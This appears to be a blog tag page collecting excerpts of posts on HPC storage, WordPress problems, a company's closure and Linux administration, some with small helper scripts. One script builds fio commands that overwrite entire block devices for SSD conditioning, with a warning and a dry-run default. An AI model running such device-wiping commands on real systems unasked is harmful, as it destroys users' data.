Below you will find pages that utilize the taxonomy term “Storage”
Posts
Wordpress is recovering (was very sick)
Please note: WordPress appears to be failing badly at this stage. I’ll be working on a fix this week, and will likely create a new site out of different, less buggy code. I’ve checked the DB, moved it to a different machine, and restored from a known working backup. It appears a recent WP update managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I’ve cleared cookies and browsing history, and used different browsers on different machines, with exactly the same outcome.
How to handle curious conversations ... part 1 of a few billion
So … Suppose someone comes up to you and makes a claim. This claim isn’t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that “none shall pass” in a Black Knight, Monty Python-esque manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating to customers, for years, the very thing they claim is impossible.
Distribution package dependency radii, or why distros may be doomed
I am a sucker for a good editor. I like Atom. Don’t yell at me. It’s pretty good for my use cases. It has lots of nice extensions I can use, and have used. Atom is not without its dependencies, though. Installing it, which should be relatively simple, turns out to be … well … interesting.
[root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm
error: Failed dependencies:
        libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64

In searching the interwebs for what Xss is, I happened across this little tidbit
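When rpm refuses an install like this, the useful part is the capability string on the indented line. As a small illustration (a sketch, not part of NyBLE or any existing tool), the Python below pulls each “X is needed by Y” line out of captured rpm output and strips the capability down to its bare library name. The function names `missing_dependencies` and `soname` are hypothetical.

```python
import re

# Matches rpm lines of the form "<capability> is needed by <package>".
NEEDED_RE = re.compile(r"^\s*(\S+)\s+is needed by\s+(\S+)\s*$")


def missing_dependencies(rpm_output):
    """Map each package to the capabilities rpm reported as missing."""
    missing = {}
    for line in rpm_output.splitlines():
        match = NEEDED_RE.match(line)
        if match:
            capability, package = match.groups()
            missing.setdefault(package, []).append(capability)
    return missing


def soname(capability):
    """Strip rpm's "()(64bit)" decoration, leaving the bare library name."""
    return capability.split("(", 1)[0]


if __name__ == "__main__":
    output = (
        "error: Failed dependencies:\n"
        "\tlibXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64\n"
    )
    for pkg, caps in missing_dependencies(output).items():
        print(pkg, [soname(c) for c in caps])
```

On CentOS 7, the full capability string (e.g. `libXss.so.1()(64bit)`) is the kind of thing one would hand to `yum provides` to find which package ships it.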
NyBLE
So there I am, updating my new repository to enable using ZFS in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a Linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.
Dealing with disappointment
In the last few years, I’ve had major professional disappointments. The collapse of Scalable, and some of the positively ridiculous things associated with its aftermath, none of which I’ll write about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I’ve had a different type of disappointment, without getting into details. The way I’ve dealt with these things in the past has been to try to understand whether there was a conflict, and what I could have done better.
Late Feb 2018 update
Again, many apologies for the low posting frequency. Several things are nearing completion (hopefully soon), and I want them finalized first. That said, the major news is that this site is now on a much improved server and network. I’ve switched from Comcast Business to WOW Business. So far: much better speed, more consistent performance, and far lower cost per unit of bandwidth. I do have lots to write about, and have been saving things up until this particular objective is met, so I can work and write distraction free.
Apologies on the slow posting rate
Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.
Cool bug on upgrade (not)
WordPress is an interesting beast. I spent hours on an upgrade working through issues I shouldn’t have needed to, because some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only by looking at a specific log. So out goes that plugin. And the site is back.
#SC17
I’ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I’d love for there to be a way to listen to the talks remotely. Maybe I’ll simply buy the DVD/USB stick of the talks if there is an online store for them.
A completed project: mysqldump file to CSV converter
This was part of something else I’d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a GitHub repo for posterity. Someone might be able to make effective use of them somewhere. The repo is located here: https://github.com/joelandman/msd2csv It’s pretty simple code: it does most of the work in memory, using multiple regex passes to transform and clean up the CSV.
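For readers curious what that kind of conversion involves, here is a minimal sketch (not the msd2csv code) that uses a regex tokenizer plus Python's `csv` module. It assumes mysqldump's extended-INSERT form with one `INSERT INTO ... VALUES (...),(...);` statement per line, and it maps `NULL` to an empty field, which is an assumption rather than anything the repo specifies. Letting the `csv` module handle quoting avoids hand-escaping commas and quotes.

```python
import csv
import io
import re

# One extended INSERT line as written by mysqldump (assumed single-line form).
INSERT_RE = re.compile(r"^INSERT INTO `?(\w+)`? VALUES (.*);\s*$")
# Tokens inside VALUES: quoted string, NULL, bare literal, or punctuation.
TOKEN_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|(NULL)|([^,()'\s]+)|([(),])")
# MySQL backslash escapes this sketch understands.
ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "\\": "\\", "'": "'", '"': '"'}


def unescape(text):
    """Undo MySQL backslash escaping inside a quoted value."""
    return re.sub(r"\\(.)", lambda m: ESCAPES.get(m.group(1), m.group(1)),
                  text, flags=re.DOTALL)


def insert_to_rows(line):
    """Return (table, rows) for one INSERT line, or (None, []) otherwise."""
    match = INSERT_RE.match(line)
    if not match:
        return None, []
    table, payload = match.groups()
    rows, row = [], None
    for token in TOKEN_RE.finditer(payload):
        quoted, null, bare, punct = token.groups()
        if punct == "(":
            row = []
        elif punct == ")":
            rows.append(row)
        elif punct == ",":
            continue
        elif quoted is not None:
            row.append(unescape(quoted))
        elif null:
            row.append("")  # assumption: NULL becomes an empty CSV field
        else:
            row.append(bare)
    return table, rows


def rows_to_csv(rows):
    """Serialize rows with the csv module so commas and quotes are escaped."""
    buffer = io.StringIO()
    csv.writer(buffer, lineterminator="\n").writerows(rows)
    return buffer.getvalue()
```

Because quoted strings are matched as whole tokens, a `)` or `,` inside a value does not split a row.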
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about as a result of Seagate doing some profound and deep thinking about what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. Seagate acquired ClusterStor as part of its earlier acquisition of Xyratex. Xyratex was the basis for the Cray storage platforms (post Engenio).
The birthday problem (allocation collisions) for networks and MAC addresses
The birthday problem is fairly simple to state. There is at least a 50% probability (i.e. an even chance) that at least 2 of 23 randomly chosen people in a room share the same birthday. This comes from some elementary applications of probability, and is documented on Wikipedia. While we care little about networks celebrating their annual journey around Sol, we care a great deal about potential address collisions for statically assigned IP addresses.
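To make the arithmetic concrete, here is a small sketch. It assumes, as the classic problem does, that each of n hosts picks an address independently and uniformly at random from N possibilities. The exact collision probability is then 1 - prod((N - i) / N for i in 0..n-1), and the usual approximation is 1 - exp(-n(n-1) / 2N). The function names are hypothetical.

```python
import math


def collision_probability(hosts, space):
    """Exact chance that at least two of `hosts` random picks from `space` values collide."""
    p_unique = 1.0
    for i in range(hosts):
        p_unique *= (space - i) / space
    return 1.0 - p_unique


def approx_collision_probability(hosts, space):
    """Standard approximation: 1 - exp(-n(n-1) / 2N)."""
    return 1.0 - math.exp(-hosts * (hosts - 1) / (2 * space))


def hosts_for_even_odds(space, target=0.5):
    """Smallest number of random picks giving at least `target` collision probability."""
    hosts, p_unique = 0, 1.0
    while 1.0 - p_unique < target:
        p_unique *= (space - hosts) / space
        hosts += 1
    return hosts


if __name__ == "__main__":
    print(hosts_for_even_odds(365))  # the classic birthday case
    print(hosts_for_even_odds(254))  # randomly chosen static IPs in one /24
```

Real address assignments are rarely uniform random, so treat these figures as a rough guide to how quickly collisions become likely, not as a prediction for any particular network.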
Now for your bidding pleasure, the contents of one company
This is an ongoing process I won’t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit.
Lot 2-57215: 2 mac minis (one was my desktop unit)
Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx
Lot 2-57081: Mac pro tower unit
Lot 2-57232: a bunch of awesome monitors
Lot 2-57222: Mini 24U rack with PDUs
Lot 2-57015: Supermicro Twin 2U system (5 others just like it)
Lot 2-57100: a 40 core 256GB testbed machine
And many other computer systems, parts, etc.
One door has closed, another has opened
As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things … we must move forward. It is cliché to use the title phrase. But it is also true. We know the door that closed. It’s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many things similar to what I did at Scalable.
Hard disk shipments dropped 10% QoQ, 2% YoY
This jibes very well with what I’ve observed: decreasing demand for enterprise storage hard disks, or as I call them, “Spinning Rust Drives” (SRD), as compared with SSDs (Solid State Drives). The summary is here, with a key quote being
Again, this jibes well with what I’ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with, or less than, what Scalable Informatics sustained years before. From the SC13 show floor in 2013, after blasting through a POC at unheard-of speed, and setting long-standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency
* 45GBps read bandwidth
* 15GBps write bandwidth
* 7 million IOPS

But then … a fibre connection.
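As a quick sanity check on those figures, a couple of lines of arithmetic help. This assumes, which the article may not claim, that the IOPS and latency numbers hold at the same time, and it reads GBps as 10^9 bytes/s. Little's law (L = λW) gives the number of I/Os that must be in flight, and bandwidth divided by IOPS gives the implied average I/O size.

```python
def ios_in_flight(iops, latency_seconds):
    """Little's law, L = lambda * W: average number of outstanding I/Os."""
    return iops * latency_seconds


def average_io_size(bytes_per_second, iops):
    """Average transfer size implied by a bandwidth figure and an IOPS figure."""
    return bytes_per_second / iops


# Figures quoted in the article; pairing them up like this is an assumption.
IOPS = 7_000_000
LATENCY_S = 200e-6
READ_BW = 45e9

print(f"~{ios_in_flight(IOPS, LATENCY_S):.0f} I/Os in flight")
print(f"~{average_io_size(READ_BW, IOPS) / 1000:.1f} kB average read size")
```

That works out to roughly 1,400 outstanding I/Os at about 6.4 kB each, which is a useful frame for judging what the external connection has to carry.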
Requiem
This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading … no … dominating … from the metrics customers tell you are important … position.
Best comment I've seen in a bug report about a tool
So … gnome-terminal has been my standard CLI interface on Linux GUIs for a while. I can’t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I’ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things are missing when you right-click. Like “open new tab”. Open new window is there. This works. But no tab entry.
structure by indentation ... grrrr ....
If you have to do this:
:%s/\t/ /g

in order to get a very simple function to compile because of this error

  File "./snd.py", line 13
    return sum
             ^
IndentationError: unindent does not match any outer indentation level

even though your editor (atom!!!!??!?!) wasn’t showing you these mixed tabs and spaces … Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.
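Rather than trusting the editor to show whitespace, a few lines of Python can report which lines are indented with tabs, spaces, or both, and can rewrite only the leading whitespace. This is a minimal sketch; the function names and the default tab width of 4 are assumptions. Unlike the `:%s/\t/ /g` substitution, which turns every tab anywhere in the file into a single space, it leaves tabs inside strings alone. (The standard library's `tabnanny` module does a similar check via `python -m tabnanny file.py`.)

```python
def indentation_report(source):
    """Classify indented lines by the whitespace used to indent them."""
    report = {"tabs": [], "spaces": [], "mixed": []}
    for lineno, line in enumerate(source.splitlines(), start=1):
        if not line.strip():
            continue  # blank lines do not affect indentation
        indent = line[: len(line) - len(line.lstrip(" \t"))]
        if not indent:
            continue
        has_tab, has_space = "\t" in indent, " " in indent
        if has_tab and has_space:
            report["mixed"].append(lineno)
        elif has_tab:
            report["tabs"].append(lineno)
        else:
            report["spaces"].append(lineno)
    return report


def detab_indentation(source, tabsize=4):
    """Expand tabs in leading whitespace only, leaving string contents alone."""
    fixed = []
    for line in source.splitlines(keepends=True):
        body = line.lstrip(" \t")
        indent = line[: len(line) - len(body)]
        fixed.append(indent.expandtabs(tabsize) + body)
    return "".join(fixed)


if __name__ == "__main__":
    broken = "def total(xs):\n    s = sum(xs)\n\treturn s\n"
    print(indentation_report(broken))
    compile(detab_indentation(broken), "snd.py", "exec")  # compiles cleanly now
```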
What is old, is new again
Way back in the prehistory of the internet (really ARPANET/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to move from statically linked programs to more modular dynamic linking. The thinking was that it would save precious memory, not having many copies of libc statically linked into binaries. It would reduce file sizes, as most of your code would be in libraries.
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely to be true for at least the rest of the year, if not longer. This article goes into some of the depth that I’ve tried to convey to others in phone conversations and private email threads.
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and in The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And really it wasn’t us, but my buddy Dr. James Cuff of Harvard.
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
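When something claims LLDP frames are coming from a box, a first step is confirming what the frames actually are and which chassis and port they name. The sketch below is illustrative only, not the tooling used on the Unison units, and `parse_lldp_frame` is a hypothetical name. It assumes you already have raw, untagged Ethernet II frames (for example from a packet capture), checks for the LLDP EtherType 0x88CC, and walks the TLVs, each of which starts with a 7-bit type and a 9-bit length.

```python
import struct

LLDP_ETHERTYPE = 0x88CC
TLV_NAMES = {0: "end", 1: "chassis_id", 2: "port_id", 3: "ttl", 5: "system_name"}


def parse_lldp_frame(frame):
    """Return a list of (tlv_name, value) pairs, or None if not an LLDP frame.

    Assumes an untagged Ethernet II frame: 6-byte dst, 6-byte src, 2-byte EtherType.
    """
    if len(frame) < 14:
        return None
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != LLDP_ETHERTYPE:
        return None
    tlvs, offset = [], 14
    while offset + 2 <= len(frame):
        (header,) = struct.unpack("!H", frame[offset:offset + 2])
        tlv_type, length = header >> 9, header & 0x01FF  # 7-bit type, 9-bit length
        value = frame[offset + 2:offset + 2 + length]
        tlvs.append((TLV_NAMES.get(tlv_type, tlv_type), value))
        offset += 2 + length
        if tlv_type == 0:  # End of LLDPDU
            break
    return tlvs
```

A chassis ID TLV whose first byte (the subtype) is 4 carries a MAC address, which usually makes it easy to check whether the frames really originate from the host's own NICs.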
Virtualized infrastructure, with VM storage on software RAID + a rebuild == occasional VM pauses
Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I’ve got a machine I’ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.
There are real, and subtle differences between su and sudo
Most of the time, sudo just works. Every now and then, it doesn’t. Most recently was with a build I am working on, where I got a “permission denied” error for creating a directory. The reason for this was non-obvious at first. You “are” superuser after all when you sudo, right? Aren’t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.
Combine these things, and get a very difficult to understand customer service
I’m in the process of disconnecting a service we don’t need anymore. So I call their number. It obviously reroutes to a remote call center, one where English is not the primary language. I’m ok with this, but the person has a very thick, hard-to-understand accent. Their usage and idiom were neither American nor British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.
A new (old) customer for the day job
Our friends at MSU HPCC are now the proud owners of a very fast, high performance Unison Flash storage system, and a ZFS-backed, high performance Unison spinning disk storage unit. Installed the first week of Jan 2017. As MSU is one of my alma maters, I am quite happy about helping them out with this kit. They’ve been a customer before; they bought some HPC MPI/OpenMP programming training in the dim and distant past.
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job has been asked to discuss how its solutions are differentiated. Time and time again, we showed benchmarks on real workloads with significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
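The kind of accounting described here starts with reading /proc/mdstat. Below is a minimal sketch (not the tool from this post) that parses mdstat-style text into per-array member, spare, and failed lists, plus the `[UU_]` status string. It takes text rather than a path so it can be tried on a saved copy; on a live box one would pass it `open("/proc/mdstat").read()`. The function names are hypothetical.

```python
import re

DEVICE_RE = re.compile(r"^([\w-]+)\[\d+\](?:\((\w)\))?$")
STATUS_RE = re.compile(r"\[([U_]+)\]\s*$")


def parse_mdstat(text):
    """Summarize arrays in /proc/mdstat-style text: level, members, spares, failures."""
    arrays, current = {}, None
    for line in text.splitlines():
        header = re.match(r"^(md\w+)\s*:\s*(.*)$", line)
        if header:
            name, rest = header.groups()
            fields = rest.split()
            current = arrays[name] = {"state": fields[0] if fields else None,
                                      "level": None, "active": [], "spare": [],
                                      "failed": [], "status": None}
            for field in fields[1:]:
                dev = DEVICE_RE.match(field)
                if dev:
                    # (S) marks a spare, (F) a failed member; anything else counts as active.
                    key = {"S": "spare", "F": "failed"}.get(dev.group(2), "active")
                    current[key].append(dev.group(1))
                elif not field.startswith("("):
                    current["level"] = field  # e.g. raid6; "(auto-read-only)" is skipped
            continue
        status = STATUS_RE.search(line)
        if current is not None and status and current["status"] is None:
            current["status"] = status.group(1)
    return arrays


def missing_members(array):
    """Number of slots marked "_" (missing or failed) in the [UU_] status."""
    return array["status"].count("_") if array["status"] else 0
```

Comparing the `spare` list against the drives you believe you installed is then a one-liner, which is exactly the “you thought you had a hot spare” check.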
fortran for webapps
Use Fortran for your MVC web app. No, really … Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so … 80s … Like in grad school, man … You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.
She's dead Jim
It looks like (if the rumor is true) Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS. This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects … yeah … it’s likely over. FWIW: I like SmartOS. The issue for it is drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox’s fault).
Inventory reduction event at the day job
We’ve got 3x Unison (https://scalableinformatics.com/unison) and 1x Cadence (https://scalableinformatics.com/cadence) systems that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPS (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis; feel free to reach out if you’d like to hear more.
Specs:
ucp-01: Unison1, 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 60x 2TB drives, 4x 800GB SSD
ucp-04: Unison2, 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 60x 2TB drives, 4x 800GB SSD
usn-03: Cadence1, 12 core, 128GB RAM, 2x40GbE or 4x10GbE ports, 48x 400GB SATA SSD
One more unlisted Unison unit with the same specs as the others, though with 3TB drives.
It’s 2016, almost 2017 ... fix your application installer so it doesn't need to reboot my machine!
There I was, running my Windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries … because … hey … they haven’t quite figured out that the word processor should do this for you … AUTOMATICALLY … Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company’s code pops up and says “hey, you wanna update me?
Watching a low level attack in process
I won’t say where, but it is fascinating watching what is being tried. I won’t divulge details of any sort (asymmetric information works to my advantage here).
On expectations
This has happened multiple times over the last few months. Just variations on a theme, as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics on the market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors to meet, and fairly simple for us to address.
The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some "helpers"
Short version. The day job was sending some marketing out. The URLs were pretty clear cut. Tested well. But some clients seem to have mis-parsed the URLs. Like with a trailing “)”. For some reason. That I don’t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn’t quite work the way it was intended, and it killed the requests.
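One way to tolerate such mangled links at the application level, sketched here as an alternative and not as the fix used at the day job, is to normalize the requested URL by stripping punctuation a mail client may have glued on, while keeping a `)` that balances a `(` inside the URL itself (Wikipedia-style links). `clean_url` and the `TRAILING_JUNK` set are hypothetical choices.

```python
TRAILING_JUNK = ").,;:!?'\""


def clean_url(url):
    """Strip punctuation a mail client may have glued onto the end of a URL.

    A trailing ")" is kept when it balances a "(" earlier in the URL, so
    links like .../wiki/Foo_(bar) survive untouched.
    """
    while url and url[-1] in TRAILING_JUNK:
        if url[-1] == ")" and url.count("(") >= url.count(")"):
            break
        url = url[:-1]
    return url
```

In a web app, one would compare `clean_url(path)` with the requested path and issue a permanent redirect when they differ, rather than rewriting the request in place, so a bad match degrades into an extra round trip instead of a dead request.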
Build me a big data analysis room
This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall … 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn’t allow any of these, but it was still a cool request.
Running conditioning on 4x Forte #HPC #NVMe #storage units
This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.
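For anyone wanting to try something similar, here is a rough sketch of “one conditioning process per device, multiple passes”, built on fio. The option names (`--rw`, `--bs`, `--direct`, `--ioengine`, `--iodepth`, `--loops`) are real fio options, but the values chosen (1M sequential writes, libaio, queue depth 32) are assumptions, not the day job's actual conditioning recipe, and the device paths are hypothetical. With no size given, fio should size the job to the whole block device. **Running these commands destroys all data on the devices**, so the sketch only returns the command lines unless `dry_run=False`.

```python
import subprocess
from concurrent.futures import ThreadPoolExecutor


def conditioning_command(device, passes, block_size="1M", iodepth=32):
    """Build one fio command that sequentially fills `device` `passes` times.

    WARNING: running this command destroys all data on the device.
    """
    return [
        "fio",
        "--name=condition",
        f"--filename={device}",
        "--rw=write",           # sequential fill of the whole device
        f"--bs={block_size}",
        "--direct=1",           # bypass the page cache
        "--ioengine=libaio",
        f"--iodepth={iodepth}",
        f"--loops={passes}",    # repeat the fill pass
    ]


def condition_all(devices, passes, dry_run=True):
    """One conditioning process per device, all running concurrently."""
    commands = [conditioning_command(dev, passes) for dev in devices]
    if dry_run:
        return commands
    with ThreadPoolExecutor(max_workers=max(1, len(commands))) as pool:
        return list(pool.map(lambda cmd: subprocess.run(cmd, check=True), commands))
```

Running the devices concurrently, rather than one after another, keeps the wall-clock time close to a single device's pass time multiplied by the number of passes.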
Amazing statistics
In the last year, this is what this blog has seen for visitors/viewers and page views:
188,654 (unique) visitors
2,572,665 page views
I am … humbled …
Aquila launches Aquarius
Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners … Congrats guys! Great job!
New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s
This is an update to Scalable Informatics’ “portable petabyte” offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we’ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included … long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we’ve built or integrated into the systems.
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean version of our SIOS RAMdisk image, as close to a baseline distro as possible, using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
An article on Python vs Julia for scripting
For those who don’t know, Julia is a very powerful new language, which aims to leverage JIT compilation to generate very fast numerical/computational code from a well thought out language. I’ve argued for a while that it feels like a better Python than Python. Python, for those who aren’t aware, is a scripting language which has risen in popularity over recent years. It is generally fairly easy to work in, with a few caveats.
M&A time: HPE buys SGI, mostly for the big data analytics appliances
I do expect more consolidation in this space. There aren’t many players doing what SGI (and the day job) do. The story is here. The interesting thing about this is that it is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low … And the point they make about the data explosion is exactly what we talk about as well.
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
About that cloud "security"
Wow … might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn’t just a highly over specialized case, and is actually applicable to real world scenarios, we’ll need to make sure we understand methods to mitigate.
Ah Gmail ... losing more emails
So … my wife and I have private Gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to Gmail. Not in the spam folder. But to Gmail. So I have her send it to this machine. Gets here right away. We moved the day job’s support email address off Gmail (it’s just a reflector now) onto the same tech running inside our FW.
Real scalability is hard, aka there are no silver bullets
I talked about hypothetical silver bullets recently, at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet … no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot throw a metric ton of machines at a problem and expect scaling to be simple and linear.
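Amdahl's law is one simple model of why adding machines does not scale linearly. It is, if anything, optimistic, because it ignores communication and coordination costs entirely. It is offered here as an illustration, not as the analysis from the talk. If a fraction p of the work parallelizes perfectly across n machines, the speedup is 1 / ((1 - p) + p / n).

```python
def amdahl_speedup(parallel_fraction, machines):
    """Amdahl's law: speedup = 1 / ((1 - p) + p / n)."""
    serial = 1.0 - parallel_fraction
    return 1.0 / (serial + parallel_fraction / machines)


if __name__ == "__main__":
    for n in (1, 10, 100, 1000):
        print(n, round(amdahl_speedup(0.95, n), 2))
```

Even with 95% of the work perfectly parallel, 1,000 machines deliver less than a 20x speedup, because the serial 5% caps it at 1 / 0.05 = 20.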
Having to do this in a kernel build is simply annoying
So there are some macros, __DATE__ and __TIME__, that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make “reproducible builds” harder. Well, no, they really don’t. That’s a side issue. And of course, modern kernel builds use -Wall -Werror, which converts warnings like

macro "__TIME__" might prevent reproducible builds [-Werror=date-time]

into real honest-to-goodness errors.
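Before building an out-of-tree module, it can help to find every offending macro up front instead of hitting the errors one at a time. Below is a minimal sketch that scans `.c` and `.h` files for `__DATE__`, `__TIME__`, and `__TIMESTAMP__` (the three macros gcc's `-Wdate-time` warns about). The function names are hypothetical, and what to replace the macros with, such as a fixed version string, is left to the reader.

```python
import re
from pathlib import Path

# __DATE__, __TIME__ and __TIMESTAMP__ all trip gcc's -Wdate-time warning.
MACRO_RE = re.compile(r"\b__(DATE|TIME|TIMESTAMP)__\b")


def scan_text(name, text):
    """Return (name, line number, line) for each line using a date/time macro."""
    return [
        (name, lineno, line.strip())
        for lineno, line in enumerate(text.splitlines(), start=1)
        if MACRO_RE.search(line)
    ]


def find_date_time_macros(root):
    """Walk a source tree and report date/time macro uses in .c and .h files."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in (".c", ".h"):
            hits.extend(scan_text(str(path), path.read_text(errors="replace")))
    return hits
```

Pointing `find_date_time_macros` at the driver's source directory gives a short list of lines to patch before running the kernel build.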
Going to #KXcon2016 this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData
This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk … haven’t been there since I did my undergrad at Stony Brook.
Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage
… through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.
Success with rambooted Lustre v2.8.53 for #HPC #storage
[root@usn-ramboot ~]# uname -r
3.10.0-327.13.1.el7_lustre.x86_64
[root@usn-ramboot ~]# df -h /
Filesystem      Size  Used Avail Use% Mounted on
tmpfs           8.0G  4.3G  3.8G  53% /
[root@usn-ramboot ~]#
